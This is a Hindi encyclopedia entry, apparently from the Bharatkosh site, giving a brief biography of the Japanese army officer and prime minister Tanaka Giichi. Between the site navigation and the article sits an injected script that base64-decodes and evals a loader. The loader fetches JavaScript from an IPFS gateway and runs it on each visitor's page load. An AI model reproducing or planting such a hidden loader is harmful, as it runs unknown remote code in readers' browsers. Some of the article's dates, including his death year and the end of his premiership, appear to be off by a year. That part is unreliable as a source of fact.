तनाका, बैरन गि-इची

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

तनाका, बैरन गि-इची यह जापान का सैनिक अधिकारी और राजनीतिज्ञ था। इसका जन्म १८६३ ई० में और देहांत १९२८ ई० में हुआ। १९१० से १९१३ तक यह सैनिक विभाग में 'जनरल स्टाफ' का 'वाइस चीफ' था और १९१८ से १९२१ तक युद्धमंत्री रहा। १९२० में इसे सेनाध्यक्ष बना दिया गया और बैरन की उपाधि दी गई। १९२१ में सैनिक सेवा से अवकाश प्राप्त किया। चार वर्ष बाद इसने राजनीतिक क्षेत्र में प्रवेश किया तथा १९२६ में यह सीयूक्वाई दल का नेता बना। १९२७ में इसने अपना मंत्रिमंडल बनाया। जुलाई १९२८ तक प्रधान मंत्री और परराष्ट्रमंत्री का कार्यभार सँभाला। उसी वर्ष २८ सितंबर को इसका देहांत हो गया।

टीका टिप्पणी और संदर्भ